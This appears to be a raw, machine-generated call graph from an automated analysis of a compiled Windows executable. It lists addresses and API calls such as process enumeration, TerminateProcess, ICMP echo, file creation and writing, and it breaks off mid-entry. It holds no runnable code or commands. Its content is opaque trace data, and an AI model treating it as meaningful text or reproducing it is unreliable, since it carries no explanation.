98335->98577 98588 785ac3 98335->98588 98596 78162d 98335->98596 98601 78153b 59 API calls 2 library calls 98335->98601 98602 774f3c 59 API calls Mailbox 98335->98602 98337->98335 98340->98335 98341->98335 98344->98335 98674 7ed1c6 98345->98674 98347 7ee61c 98347->98269 98349 7dd6dd 98348->98349 98350 7dd6e8 98348->98350 98352 77502b 59 API calls 98349->98352 98351 7dd7c2 Mailbox 98350->98351 98354 781207 59 API calls 98350->98354 98353 790fe6 Mailbox 59 API calls 98351->98353 98390 7dd7cb Mailbox 98351->98390 98352->98350 98355 7dd80b 98353->98355 98356 7dd70c 98354->98356 98357 7dd817 98355->98357 98879 783df7 60 API calls Mailbox 98355->98879 98358 781207 59 API calls 98356->98358 98360 774d37 84 API calls 98357->98360 98361 7dd715 98358->98361 98362 7dd82f 98360->98362 98363 774d37 84 API calls 98361->98363 98805 783e47 98362->98805 98365 7dd721 98363->98365 98816 790119 98365->98816 98368 7dd876 98373 7dd8d8 98368->98373 98374 7dd8a1 98368->98374 98369 7dd842 GetLastError 98371 7dd85b 98369->98371 98370 7dd736 98372 7817e0 59 API calls 98370->98372 98371->98390 98880 783f0b CloseHandle 98371->98880 98375 7dd769 98372->98375 98377 790fe6 Mailbox 59 API calls 98373->98377 98376 790fe6 Mailbox 59 API calls 98374->98376 98382 7d412a 3 API calls 98375->98382 98392 7dd793 Mailbox 98375->98392 98379 7dd8a6 98376->98379 98378 7dd8dd 98377->98378 98385 781207 59 API calls 98378->98385 98378->98390 98383 7dd8b7 98379->98383 98386 781207 59 API calls 98379->98386 98381 77502b 59 API calls 98381->98351 98384 7dd779 98382->98384 98881 7dfc0d 59 API calls 2 library calls 98383->98881 98387 781a36 59 API calls 98384->98387 98384->98392 98385->98390 98386->98383 98389 7dd78a 98387->98389 98867 7d3f1d 98389->98867 98390->98269 98392->98381 98929 7d494a GetFileAttributesW 98393->98929 98397 774d37 84 API calls 98396->98397 98398 7ef1cf 98397->98398 98933 7d4148 CreateToolhelp32Snapshot Process32FirstW 98398->98933 98400 7ef1de 98400->98269 98402 7e5e46 98401->98402 98403 7e5e74 WSAStartup 98402->98403 98404 77502b 59 API calls 98402->98404 98405 7e5e9d 98403->98405 98415 7e5e88 Mailbox 98403->98415 98406 7e5e61 98404->98406 98954 7840cd 98405->98954 98406->98403 98410 77502b 59 API calls 98406->98410 98409 774d37 84 API calls 98411 7e5eb2 98409->98411 98412 7e5e70 98410->98412 98959 78402a WideCharToMultiByte 98411->98959 98412->98403 98414 7e5ebf inet_addr gethostbyname 98414->98415 98416 7e5edd IcmpCreateFile 98414->98416 98415->98269 98416->98415 98417 7e5f01 98416->98417 98418 790fe6 Mailbox 59 API calls 98417->98418 98419 7e5f1a 98418->98419 98967 78433f 98419->98967 98422 7e5f34 IcmpSendEcho 98424 7e5f6d 98422->98424 98423 7e5f55 IcmpSendEcho 98423->98424 98425 7e5fd4 IcmpCloseHandle WSACleanup 98424->98425 98425->98415 98972 774f98 98426->98972 98430 790fe6 Mailbox 59 API calls 98431 77d6aa 98430->98431 98434 77d6ba 98431->98434 99002 783df7 60 API calls Mailbox 98431->99002 98432 7b5068 98433 77d6df 98432->98433 99007 7dfbb7 59 API calls 98432->99007 98437 77502b 59 API calls 98433->98437 98443 77d6ec 98433->98443 98436 774d37 84 API calls 98434->98436 98438 77d6c8 98436->98438 98440 7b50b0 98437->98440 98439 783e47 67 API calls 98438->98439 98441 77d6d7 98439->98441 98442 7b50b8 98440->98442 98440->98443 98441->98432 98441->98433 99006 783f0b CloseHandle 98441->99006 98445 77502b 59 API calls 98442->98445 98985 7841d6 98443->98985 98447 77d6f3 98445->98447 98448 7b50ca 98447->98448 98449 77d70d 98447->98449 98451 790fe6 Mailbox 59 API calls 98448->98451 98450 781207 59 API calls 98449->98450 98453 77d715 98450->98453 98452 7b50d0 98451->98452 98454 7b50e4 98452->98454 98990 783ea1 98452->98990 99003 783b7b 65 API calls Mailbox 98453->99003 98459 7b50e8 _memmove 98454->98459 98993 7d7c7f 98454->98993 98458 77d724 98458->98459 99004 774f3c 59 API calls Mailbox 98458->99004 98461 77d738 Mailbox 98462 77d772 98461->98462 98463 7842cf CloseHandle 98461->98463 98462->98269 98464 77d766 98463->98464 98464->98462 99005 783f0b CloseHandle 98464->99005 98467 7d494a 3 API calls 98466->98467 98468 7d413f 98467->98468 98468->98269 98470 7ec39a 98469->98470 98471 7ec380 98469->98471 99015 7ea8fd 98470->99015 99042 7da48d 89 API calls 4 library calls 98471->99042 98475 7753b0 298 API calls 98476 7ec406 98475->98476 98477 7ec392 Mailbox 98476->98477 98478 7ec498 98476->98478 98482 7ec447 98476->98482 98477->98252 98479 7ec4ee 98478->98479 98480 7ec49e 98478->98480 98479->98477 98481 774d37 84 API calls 98479->98481 99043 7d7ed5 59 API calls 98480->99043 98483 7ec500 98481->98483 98485 7d789a 59 API calls 98482->98485 98486 781aa4 59 API calls 98483->98486 98488 7ec477 98485->98488 98489 7ec524 CharUpperBuffW 98486->98489 98487 7ec4c1 99044 7835b9 59 API calls Mailbox 98487->99044 98491 7c6ebc 298 API calls 98488->98491 98493 7ec53e 98489->98493 98491->98477 98492 7ec4c9 Mailbox 99045 77b020 98492->99045 98494 7ec591 98493->98494 98497 7ec545 98493->98497 98496 774d37 84 API calls 98494->98496 98498 7ec599 98496->98498 99022 7d789a 98497->99022 99087 775376 60 API calls 98498->99087 98503 7ec5a3 98503->98477 98504 774d37 84 API calls 98503->98504 98505 7ec5be 98504->98505 99088 7835b9 59 API calls Mailbox 98505->99088 98507 7ec5ce 98508 77b020 298 API calls 98507->98508 98508->98477 98509->98286 98510->98286 98511->98269 98512->98252 98513->98254 98514->98246 98515->98259 98516->98261 98518 781caf 98517->98518 98519 781ca7 98517->98519 98518->98252 99627 781bcc 59 API calls 2 library calls 98519->99627 98521->98252 98523 781a45 __wsetenvp _memmove 98522->98523 98524 790fe6 Mailbox 59 API calls 98523->98524 98525 781a83 98524->98525 98525->98252 98526->98252 98527->98269 98528->98272 98529->98285 98530->98289 98531->98239 98532->98285 98533->98239 98534->98239 98535->98285 98536->98285 98537->98323 98538->98323 98539->98313 98540->98321 98541->98312 98542->98321 98543->98321 98545 774d51 98544->98545 98546 774d4b 98544->98546 98547 7adb28 __i64tow 98545->98547 98548 774d99 98545->98548 98550 774d57 __itow 98545->98550 98553 7ada2f 98545->98553 98562 775278 98546->98562 98603 7938c8 83 API calls 3 library calls 98548->98603 98552 790fe6 Mailbox 59 API calls 98550->98552 98554 774d71 98552->98554 98555 790fe6 Mailbox 59 API calls 98553->98555 98560 7adaa7 Mailbox _wcscpy 98553->98560 98554->98546 98556 781a36 59 API calls 98554->98556 98557 7ada74 98555->98557 98556->98546 98558 790fe6 Mailbox 59 API calls 98557->98558 98559 7ada9a 98558->98559 98559->98560 98561 781a36 59 API calls 98559->98561 98604 7938c8 83 API calls 3 library calls 98560->98604 98561->98560 98563 790fe6 Mailbox 59 API calls 98562->98563 98564 775285 98563->98564 98565 775294 98564->98565 98566 781a36 59 API calls 98564->98566 98565->98330 98566->98565 98568 793139 98567->98568 98569 7931ae 98567->98569 98576 79315e 98568->98576 98605 798d58 58 API calls __getptd_noexit 98568->98605 98607 7931c0 60 API calls 3 library calls 98569->98607 98572 7931bb 98572->98335 98573 793145 98606 798fe6 9 API calls __controlfp_s 98573->98606 98575 793150 98575->98335 98576->98335 98578 7859fe _memset 98577->98578 98608 785800 98578->98608 98582 785ab9 Shell_NotifyIconW 98584 785aab 98582->98584 98583 785a9d Shell_NotifyIconW 98583->98584 98612 7856f8 98584->98612 98586 785a83 98586->98582 98586->98583 98587 785ab2 98587->98335 98589 785b25 98588->98589 98590 785ad5 _memset 98588->98590 98589->98335 98591 785af4 Shell_NotifyIconW 98590->98591 98591->98589 98593 775041 98592->98593 98594 77503c 98592->98594 98593->98335 98594->98593 98673 7937ba 59 API calls 98594->98673 98597 790fe6 Mailbox 59 API calls 98596->98597 98598 781652 98597->98598 98599 790fe6 Mailbox 59 API calls 98598->98599 98600 781660 98599->98600 98600->98335 98601->98335 98602->98335 98603->98550 98604->98547 98605->98573 98606->98575 98607->98572 98609 78581c 98608->98609 98610 785810 98608->98610 98609->98610 98611 785821 DestroyIcon 98609->98611 98610->98586 98642 7d34dd 62 API calls _W_store_winword 98610->98642 98611->98610 98613 785715 98612->98613 98634 7857fa Mailbox 98612->98634 98614 78162d 59 API calls 98613->98614 98615 785723 98614->98615 98616 7c0c4c LoadStringW 98615->98616 98617 785730 98615->98617 98620 7c0c66 98616->98620 98618 781821 59 API calls 98617->98618 98619 785745 98618->98619 98621 785752 98619->98621 98627 7c0c74 98619->98627 98622 781c9c 59 API calls 98620->98622 98621->98620 98623 785760 98621->98623 98630 785778 _memset _wcscpy 98622->98630 98643 781900 98623->98643 98628 7c0cb7 Mailbox 98627->98628 98629 781207 59 API calls 98627->98629 98627->98630 98660 7938c8 83 API calls 3 library calls 98628->98660 98631 7c0c9e 98629->98631 98632 7857e0 Shell_NotifyIconW 98630->98632 98659 7d0252 60 API calls Mailbox 98631->98659 98632->98634 98634->98587 98636 7c0cd6 98638 781900 59 API calls 98636->98638 98637 7c0ca9 98639 7817e0 59 API calls 98637->98639 98640 7c0ce7 98638->98640 98639->98628 98641 781900 59 API calls 98640->98641 98641->98630 98642->98586 98644 781914 98643->98644 98645 7bf534 98643->98645 98661 7818a5 98644->98661 98647 781c7e 59 API calls 98645->98647 98649 7bf53f __wsetenvp _memmove 98647->98649 98648 78191f 98650 7817e0 98648->98650 98651 7bf401 98650->98651 98652 7817f2 98650->98652 98672 7c87f9 59 API calls _memmove 98651->98672 98666 781680 98652->98666 98655 7817fe 98655->98630 98656 7bf40b 98657 781c9c 59 API calls 98656->98657 98658 7bf413 Mailbox 98657->98658 98659->98637 98660->98636 98662 7818b4 __wsetenvp 98661->98662 98663 781c7e 59 API calls 98662->98663 98664 7818c5 _memmove 98662->98664 98665 7bf4f1 _memmove 98663->98665 98664->98648 98667 781692 98666->98667 98670 7816ba _memmove 98666->98670 98668 790fe6 Mailbox 59 API calls 98667->98668 98667->98670 98671 78176f _memmove 98668->98671 98669 790fe6 Mailbox 59 API calls 98669->98671 98670->98655 98671->98669 98672->98656 98673->98593 98675 774d37 84 API calls 98674->98675 98676 7ed203 98675->98676 98681 7ed24a Mailbox 98676->98681 98712 7ede8e 98676->98712 98678 7ed29b Mailbox 98678->98681 98685 774d37 84 API calls 98678->98685 98699 7ed4a2 98678->98699 98745 7dfc0d 59 API calls 2 library calls 98678->98745 98746 7ed6c8 61 API calls 2 library calls 98678->98746 98679 7ed617 98763 7edfb1 92 API calls Mailbox 98679->98763 98681->98347 98683 7ed626 98684 7ed4b0 98683->98684 98686 7ed632 98683->98686 98725 7ed057 98684->98725 98685->98678 98686->98681 98691 7ed4e9 98740 790e38 98691->98740 98694 7ed51c 98748 7747be 98694->98748 98695 7ed503 98747 7da48d 89 API calls 4 library calls 98695->98747 98698 7ed50e GetCurrentProcess TerminateProcess 98698->98694 98699->98679 98699->98684 98704 7ed68d 98704->98681 98707 7ed6a1 FreeLibrary 98704->98707 98705 7ed554 98760 7edd32 107 API calls _free 98705->98760 98707->98681 98711 7ed565 98711->98704 98761 774230 59 API calls Mailbox 98711->98761 98762 77523c 59 API calls 98711->98762 98764 7edd32 107 API calls _free 98711->98764 98713 781aa4 59 API calls 98712->98713 98714 7edea9 CharLowerBuffW 98713->98714 98765 7cf903 98714->98765 98718 781207 59 API calls 98719 7edee2 98718->98719 98772 781462 98719->98772 98721 7edef9 98722 781981 59 API calls 98721->98722 98724 7edf05 Mailbox 98722->98724 98723 7edf41 Mailbox 98723->98678 98724->98723 98785 7ed6c8 61 API calls 2 library calls 98724->98785 98726 7ed072 98725->98726 98730 7ed0c7 98725->98730 98727 790fe6 Mailbox 59 API calls 98726->98727 98728 7ed094 98727->98728 98729 790fe6 Mailbox 59 API calls 98728->98729 98728->98730 98729->98728 98731 7ee139 98730->98731 98732 7ee362 Mailbox 98731->98732 98739 7ee15c _strcat _wcscpy __wsetenvp 98731->98739 98732->98691 98733 77502b 59 API calls 98733->98739 98734 775087 59 API calls 98734->98739 98735 7750d5 59 API calls 98735->98739 98736 774d37 84 API calls 98736->98739 98737 79593c 58 API calls __crtGetStringTypeA_stat 98737->98739 98739->98732 98739->98733 98739->98734 98739->98735 98739->98736 98739->98737 98794 7d5e42 61 API calls 2 library calls 98739->98794 98741 790e4d 98740->98741 98742 790ee5 Sleep 98741->98742 98743 790ed3 CloseHandle 98741->98743 98744 790eb3 98741->98744 98742->98744 98743->98744 98744->98694 98744->98695 98745->98678 98746->98678 98747->98698 98749 7747c6 98748->98749 98750 790fe6 Mailbox 59 API calls 98749->98750 98751 7747d4 98750->98751 98752 7747e0 98751->98752 98795 7746ec 59 API calls Mailbox 98751->98795 98754 774540 98752->98754 98796 774650 98754->98796 98756 77454f 98757 790fe6 Mailbox 59 API calls 98756->98757 98758 7745eb 98756->98758 98757->98758 98758->98711 98759 774230 59 API calls Mailbox 98758->98759 98759->98705 98760->98711 98761->98711 98762->98711 98763->98683 98764->98711 98766 7cf92e __wsetenvp 98765->98766 98767 7cf963 98766->98767 98768 7cf96d 98766->98768 98771 7cfa14 98766->98771 98767->98768 98786 7814db 98767->98786 98768->98718 98768->98724 98770 7814db 61 API calls 98770->98771 98771->98768 98771->98770 98773 7814ce 98772->98773 98774 781471 98772->98774 98775 781981 59 API calls 98773->98775 98774->98773 98776 78147c 98774->98776 98777 78149f _memmove 98775->98777 98778 7bf1de 98776->98778 98779 781497 98776->98779 98777->98721 98781 781c7e 59 API calls 98778->98781 98793 781b7c 59 API calls Mailbox 98779->98793 98782 7bf1e8 98781->98782 98783 790fe6 Mailbox 59 API calls 98782->98783 98784 7bf208 98783->98784 98785->98723 98787 7814e9 CompareStringW 98786->98787 98792 7bf210 98786->98792 98790 78150c 98787->98790 98789 7bf25f 98790->98767 98791 794eb8 60 API calls 98791->98792 98792->98789 98792->98791 98793->98777 98794->98739 98795->98752 98797 774659 Mailbox 98796->98797 98798 7ad6ec 98797->98798 98803 774663 98797->98803 98799 790fe6 Mailbox 59 API calls 98798->98799 98801 7ad6f8 98799->98801 98800 77466a 98800->98756 98803->98800 98804 775190 59 API calls Mailbox 98803->98804 98804->98803 98882 7842cf 98805->98882 98809 783e95 98809->98368 98809->98369 98810 783e72 98810->98809 98894 783c61 62 API calls Mailbox 98810->98894 98812 783e84 98895 78389f 98812->98895 98817 781207 59 API calls 98816->98817 98818 79012f 98817->98818 98819 781207 59 API calls 98818->98819 98820 790137 98819->98820 98821 781207 59 API calls 98820->98821 98822 79013f 98821->98822 98823 781207 59 API calls 98822->98823 98824 790147 98823->98824 98825 7c627d 98824->98825 98826 79017b 98824->98826 98827 781c9c 59 API calls 98825->98827 98828 781462 59 API calls 98826->98828 98829 7c6286 98827->98829 98830 790189 98828->98830 98924 7819e1 98829->98924 98832 781981 59 API calls 98830->98832 98833 790193 98832->98833 98835 7901be 98833->98835 98836 781462 59 API calls 98833->98836 98834 7901fe 98837 781462 59 API calls 98834->98837 98835->98834 98838 7901dd 98835->98838 98848 7c62a6 98835->98848 98839 7901b4 98836->98839 98843 79020f 98837->98843 98921 781609 98838->98921 98841 781981 59 API calls 98839->98841 98840 7c6376 98844 781821 59 API calls 98840->98844 98841->98835 98846 790221 98843->98846 98849 781c9c 59 API calls 98843->98849 98862 7c6333 98844->98862 98847 790231 98846->98847 98850 781c9c 59 API calls 98846->98850 98852 790238 98847->98852 98854 781c9c 59 API calls 98847->98854 98848->98840 98851 7c635f 98848->98851 98861 7c62dd 98848->98861 98849->98846 98850->98847 98851->98840 98857 7c634a 98851->98857 98855 781c9c 59 API calls 98852->98855 98864 79023f Mailbox 98852->98864 98853 781462 59 API calls 98853->98834 98854->98852 98855->98864 98856 781609 59 API calls 98856->98862 98860 781821 59 API calls 98857->98860 98858 7c633b 98859 781821 59 API calls 98858->98859 98859->98862 98860->98862 98861->98858 98865 7c6326 98861->98865 98862->98834 98862->98856 98928 78153b 59 API calls 2 library calls 98862->98928 98864->98370 98866 781821 59 API calls 98865->98866 98866->98862 98868 78133d 59 API calls 98867->98868 98869 7d3f52 GetFileAttributesW 98868->98869 98870 7d3f66 GetLastError 98869->98870 98877 7d3f7f Mailbox 98869->98877 98871 7d3f73 CreateDirectoryW 98870->98871 98872 7d3f81 98870->98872 98871->98872 98871->98877 98873 781981 59 API calls 98872->98873 98872->98877 98874 7d3fc3 98873->98874 98875 7d3f1d 59 API calls 98874->98875 98876 7d3fcc 98875->98876 98876->98877 98878 7d3fd0 CreateDirectoryW 98876->98878 98877->98392 98878->98877 98879->98357 98880->98390 98881->98390 98883 7842e8 98882->98883 98884 783e53 98882->98884 98883->98884 98885 7842ed CloseHandle 98883->98885 98886 7842f9 98884->98886 98885->98884 98887 7c06fc 98886->98887 98888 784312 CreateFileW 98886->98888 98889 7c0702 CreateFileW 98887->98889 98890 784334 98887->98890 98888->98890 98889->98890 98891 7c0728 98889->98891 98890->98810 98902 78410a 98891->98902 98894->98812 98896 7838a8 98895->98896 98897 7838b5 98895->98897 98898 78410a 2 API calls 98896->98898 98897->98809 98899 7d394d 98897->98899 98898->98897 98912 7d384c 98899->98912 98901 7d3959 WriteFile 98901->98809 98903 784124 98902->98903 98904 7c06cc 98903->98904 98905 7841ab SetFilePointerEx 98903->98905 98909 78417f 98903->98909 98911 7842ae SetFilePointerEx 98904->98911 98910 7842ae SetFilePointerEx 98905->98910 98908 7c06e6 98909->98890 98910->98909 98911->98908 98913 7d385e 98912->98913 98914 7d3853 98912->98914 98913->98901 98919 7842ae SetFilePointerEx 98914->98919 98916 7d38b8 SetFilePointerEx 98920 7842ae SetFilePointerEx 98916->98920 98918 7d38d7 98918->98901 98919->98916 98920->98918 98922 781aa4 59 API calls 98921->98922 98923 781614 98922->98923 98923->98834 98923->98853 98925 7819fb 98924->98925 98927 7819ee 98924->98927 98926 790fe6 Mailbox 59 API calls 98925->98926 98926->98927 98927->98835 98928->98862 98930 7d4131 98929->98930 98931 7d4965 FindFirstFileW 98929->98931 98930->98269 98931->98930 98932 7d497a FindClose 98931->98932 98932->98930 98943 7d4ce2 98933->98943 98935 7d4195 Process32NextW 98936 7d4244 CloseHandle 98935->98936 98942 7d418e Mailbox 98935->98942 98936->98400 98937 781207 59 API calls 98937->98942 98938 781a36 59 API calls 98938->98942 98939 790119 59 API calls 98939->98942 98940 7817e0 59 API calls 98940->98942 98942->98935 98942->98936 98942->98937 98942->98938 98942->98939 98942->98940 98949 78151f 98942->98949 98944 7d4d09 98943->98944 98945 7d4cf0 98943->98945 98953 7937c3 59 API calls __wcstoi64 98944->98953 98945->98944 98948 7d4d0f 98945->98948 98952 79385c GetStringTypeW _iswctype 98945->98952 98948->98942 98950 7814db 61 API calls 98949->98950 98951 781537 98950->98951 98951->98942 98952->98945 98953->98948 98955 790fe6 Mailbox 59 API calls 98954->98955 98956 7840e0 98955->98956 98957 781c7e 59 API calls 98956->98957 98958 7840ed 98957->98958 98958->98409 98960 78404e 98959->98960 98961 784085 98959->98961 98962 790fe6 Mailbox 59 API calls 98960->98962 98971 783f20 59 API calls Mailbox 98961->98971 98964 784055 WideCharToMultiByte 98962->98964 98970 783f79 59 API calls 2 library calls 98964->98970 98966 784077 98966->98414 98968 790fe6 Mailbox 59 API calls 98967->98968 98969 784351 98968->98969 98969->98422 98969->98423 98970->98966 98971->98966 98973 7add2b 98972->98973 98974 774fa8 98972->98974 98975 7add3c 98973->98975 98976 781821 59 API calls 98973->98976 98978 790fe6 Mailbox 59 API calls 98974->98978 98977 7819e1 59 API calls 98975->98977 98976->98975 98980 7add46 98977->98980 98979 774fbb 98978->98979 98979->98980 98981 774fc6 98979->98981 98982 774fd4 98980->98982 98983 781207 59 API calls 98980->98983 98981->98982 98984 781a36 59 API calls 98981->98984 98982->98430 98982->98432 98983->98982 98984->98982 98986 78410a 2 API calls 98985->98986 98987 7841f7 98986->98987 98988 78410a 2 API calls 98987->98988 98989 78420b 98988->98989 98989->98447 99008 784220 98990->99008 98994 7d7c8a 98993->98994 98995 790fe6 Mailbox 59 API calls 98994->98995 98996 7d7c91 98995->98996 98997 7d7c9d 98996->98997 98998 7d7cbe 98996->98998 98999 790fe6 Mailbox 59 API calls 98997->98999 99000 790fe6 Mailbox 59 API calls 98998->99000 99001 7d7ca6 _memset 98999->99001 99000->99001 99001->98459 99002->98434 99003->98458 99004->98461 99005->98462 99006->98432 99007->98432 99009 784293 99008->99009 99013 78422e 99008->99013 99014 7842ae SetFilePointerEx 99009->99014 99011 783eb2 99011->98454 99012 784266 ReadFile 99012->99011 99012->99013 99013->99011 99013->99012 99014->99013 99016 7ea918 99015->99016 99017 7ea970 99015->99017 99018 790fe6 Mailbox 59 API calls 99016->99018 99017->98475 99021 7ea93a 99018->99021 99019 790fe6 Mailbox 59 API calls 99019->99021 99021->99017 99021->99019 99089 7c715b 59 API calls Mailbox 99021->99089 99023 7d78ac 99022->99023 99025 7d78e3 99022->99025 99024 790fe6 Mailbox 59 API calls 99023->99024 99023->99025 99024->99025 99026 7c6ebc 99025->99026 99027 7c6f1c Mailbox 99026->99027 99028 7c6f06 99026->99028 99030 7c6f47 99027->99030 99032 7c6f5a 99027->99032 99029 781a36 59 API calls 99028->99029 99029->99027 99031 7ec355 299 API calls 99030->99031 99038 7c6f53 99031->99038 99090 77a820 99032->99090 99035 7c7002 99035->98477 99036 7c6f91 99037 7c6fdc 99036->99037 99036->99038 99040 7c6fc1 99036->99040 99037->99038 99112 7da48d 89 API calls 4 library calls 99037->99112 99113 7c6cf1 59 API calls Mailbox 99038->99113 99107 7c706d 99040->99107 99042->98477 99043->98487 99044->98492 99129 783740 99045->99129 99048 7b30b6 99225 7da48d 89 API calls 4 library calls 99048->99225 99050 77b07f 99050->99048 99051 7b30d4 99050->99051 99066 77bb86 99050->99066 99068 77b132 Mailbox _memmove 99050->99068 99226 7da48d 89 API calls 4 library calls 99051->99226 99053 7b355e 99086 77b4dd 99053->99086 99241 7da48d 89 API calls 4 library calls 99053->99241 99054 7b3106 99055 7b318a 99054->99055 99227 77a9de 299 API calls 99054->99227 99055->99086 99228 7da48d 89 API calls 4 library calls 99055->99228 99062 773b31 59 API calls 99062->99068 99063 7c730a 59 API calls 99063->99068 99224 7da48d 89 API calls 4 library calls 99066->99224 99067 7753b0 299 API calls 99067->99068 99068->99053 99068->99054 99068->99062 99068->99063 99068->99066 99068->99067 99069 7b3418 99068->99069 99075 7b31c3 99068->99075 99076 773c30 68 API calls 99068->99076 99078 7b346f 99068->99078 99081 77523c 59 API calls 99068->99081 99083 790fe6 59 API calls Mailbox 99068->99083 99084 781c9c 59 API calls 99068->99084 99068->99086 99134 773add 99068->99134 99141 77bc70 99068->99141 99222 773a40 59 API calls Mailbox 99068->99222 99223 775190 59 API calls Mailbox 99068->99223 99230 7c6c62 59 API calls 2 library calls 99068->99230 99231 7ea9c3 85 API calls Mailbox 99068->99231 99232 7c6c1e 59 API calls Mailbox 99068->99232 99233 7d5ef2 68 API calls 99068->99233 99234 773ea3 68 API calls Mailbox 99068->99234 99240 7da12a 59 API calls 99068->99240 99070 7753b0 299 API calls 99069->99070 99072 7b3448 99070->99072 99072->99086 99235 7739be 99072->99235 99229 7da48d 89 API calls 4 library calls 99075->99229 99076->99068 99239 7da48d 89 API calls 4 library calls 99078->99239 99081->99068 99083->99068 99084->99068 99086->98477 99087->98503 99088->98507 99089->99021 99091 7b2d51 99090->99091 99094 77a84c 99090->99094 99115 7da48d 89 API calls 4 library calls 99091->99115 99093 7b2d62 99093->99036 99095 7b2d6a 99094->99095 99105 77a888 _memmove 99094->99105 99116 7da48d 89 API calls 4 library calls 99095->99116 99097 77a962 99104 77a975 99097->99104 99114 7ea9c3 85 API calls Mailbox 99097->99114 99099 790fe6 59 API calls Mailbox 99099->99105 99100 7b2dae 99117 77a9de 299 API calls 99100->99117 99101 7753b0 299 API calls 99101->99105 99103 7b2dc8 99103->99104 99118 7da48d 89 API calls 4 library calls 99103->99118 99104->99036 99105->99097 99105->99099 99105->99100 99105->99101 99105->99103 99105->99104 99108 7c7085 99107->99108 99111 7ef1b2 91 API calls 99108->99111 99119 7e495b 99108->99119 99109 7c70d9 99109->99038 99111->99109 99112->99038 99113->99035 99114->99104 99115->99093 99116->99104 99117->99103 99118->99104 99120 790fe6 Mailbox 59 API calls 99119->99120 99121 7e496c 99120->99121 99122 78433f 59 API calls 99121->99122 99123 7e4976 99122->99123 99124 774d37 84 API calls 99123->99124 99125 7e498d GetEnvironmentVariableW 99124->99125 99128 7d7a51 59 API calls Mailbox 99125->99128 99127 7e49aa 99127->99109 99128->99127 99130 78374f 99129->99130 99133 78376a 99129->99133 99131 781aa4 59 API calls 99130->99131 99132 783757 CharUpperBuffW 99131->99132 99132->99133 99133->99050 99135 7ad3cd 99134->99135 99136 773aee 99134->99136 99137 790fe6 Mailbox 59 API calls 99136->99137 99138 773af5 99137->99138 99139 773b16 99138->99139 99242 773ba5 59 API calls Mailbox 99138->99242 99139->99068 99142 7b359f 99141->99142 99154 77bc95 99141->99154 99333 7da48d 89 API calls 4 library calls 99142->99333 99144 77bf3b 99144->99068 99148 77c2b6 99148->99144 99149 77c2c3 99148->99149 99331 77c483 299 API calls Mailbox 99149->99331 99150 77bf25 Mailbox 99150->99144 99330 77c460 10 API calls Mailbox 99150->99330 99153 77c2ca LockWindowUpdate DestroyWindow GetMessageW 99153->99144 99155 77c2fc 99153->99155 99201 77bca5 Mailbox 99154->99201 99334 775376 60 API calls 99154->99334 99335 7c700c 299 API calls 99154->99335 99156 7b4509 TranslateMessage DispatchMessageW GetMessageW 99155->99156 99156->99156 99158 7b4539 99156->99158 99157 7b36b3 Sleep 99157->99201 99158->99144 99159 7b405d WaitForSingleObject 99163 7b407d GetExitCodeProcess CloseHandle 99159->99163 99159->99201 99160 77bf54 timeGetTime 99160->99201 99161 790fe6 59 API calls Mailbox 99161->99201 99172 77c36b 99163->99172 99164 77c210 Sleep 99191 77c1fa Mailbox 99164->99191 99165 781c9c 59 API calls 99165->99201 99166 781207 59 API calls 99166->99191 99167 7b43a9 Sleep 99167->99191 99169 79083e timeGetTime 99169->99191 99171 77c324 timeGetTime 99332 775376 60 API calls 99171->99332 99172->99068 99174 7d4148 66 API calls 99174->99191 99175 7b4440 GetExitCodeProcess 99177 7b446c CloseHandle 99175->99177 99178 7b4456 WaitForSingleObject 99175->99178 99176 774d37 84 API calls 99176->99201 99177->99191 99178->99177 99178->99201 99179 776cd8 277 API calls 99179->99201 99180 7f6562 110 API calls 99180->99191 99183 776d79 109 API calls 99183->99201 99184 7b38aa Sleep 99184->99201 99185 7b44c8 Sleep 99185->99201 99188 781a36 59 API calls 99188->99191 99189 775376 60 API calls 99189->99201 99191->99164 99191->99166 99191->99169 99191->99172 99191->99174 99191->99175 99191->99180 99191->99184 99191->99185 99191->99188 99191->99201 99342 7d2baf 60 API calls 99191->99342 99343 775376 60 API calls 99191->99343 99344 773ea3 68 API calls Mailbox 99191->99344 99345 776cd8 299 API calls 99191->99345 99346 7c70e2 59 API calls 99191->99346 99347 7d57ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 99191->99347 99195 77c26d 99198 781a36 59 API calls 99195->99198 99196 77b020 277 API calls 99196->99201 99198->99150 99199 781a36 59 API calls 99199->99201 99200 7ec355 277 API calls 99200->99201 99201->99150 99201->99157 99201->99159 99201->99160 99201->99161 99201->99164 99201->99165 99201->99167 99201->99171 99201->99172 99201->99176 99201->99179 99201->99183 99201->99189 99201->99191 99201->99195 99201->99196 99201->99199 99201->99200 99203 77a820 277 API calls 99201->99203 99204 775190 59 API calls Mailbox 99201->99204 99205 7753b0 277 API calls 99201->99205 99207 7739be 68 API calls 99201->99207 99208 7da48d 89 API calls 99201->99208 99209 7b3e13 VariantClear 99201->99209 99210 7c7aad 59 API calls 99201->99210 99211 7c6cf1 59 API calls Mailbox 99201->99211 99212 7b3ea9 VariantClear 99201->99212 99213 7741c4 59 API calls Mailbox 99201->99213 99214 7b3c57 VariantClear 99201->99214 99215 773ea3 68 API calls 99201->99215 99216 7ee60c 130 API calls 99201->99216 99217 7d412a 3 API calls 99201->99217 99218 7842cf CloseHandle 99201->99218 99243 7752b0 99201->99243 99252 779a00 99201->99252 99259 779c80 99201->99259 99290 7dc270 99201->99290 99297 7dbcd6 99201->99297 99327 7de4a0 99201->99327 99336 7f6655 59 API calls 99201->99336 99337 7da058 59 API calls Mailbox 99201->99337 99338 7ce0aa 59 API calls 99201->99338 99339 7c6c62 59 API calls 2 library calls 99201->99339 99340 7738ff 59 API calls 99201->99340 99341 773a40 59 API calls Mailbox 99201->99341 99203->99201 99204->99201 99205->99201 99207->99201 99208->99201 99209->99201 99210->99201 99211->99201 99212->99201 99213->99201 99214->99201 99215->99201 99216->99201 99217->99201 99218->99201 99222->99068 99223->99068 99224->99048 99225->99086 99226->99086 99227->99055 99228->99086 99229->99086 99230->99068 99231->99068 99232->99068 99233->99068 99234->99068 99237 7739c9 99235->99237 99238 7739f0 99237->99238 99626 773ea3 68 API calls Mailbox 99237->99626 99238->99078 99239->99086 99240->99068 99241->99086 99242->99139 99244 7752c6 99243->99244 99246 775313 99243->99246 99245 7752d3 PeekMessageW 99244->99245 99244->99246 99245->99246 99247 7752ec 99245->99247 99246->99247 99249 7adf68 TranslateAcceleratorW 99246->99249 99250 775352 TranslateMessage DispatchMessageW 99246->99250 99251 77533e PeekMessageW 99246->99251 99348 77359e 99246->99348 99247->99201 99249->99246 99249->99251 99250->99251 99251->99246 99251->99247 99253 779a31 99252->99253 99254 779a1d 99252->99254 99387 7da48d 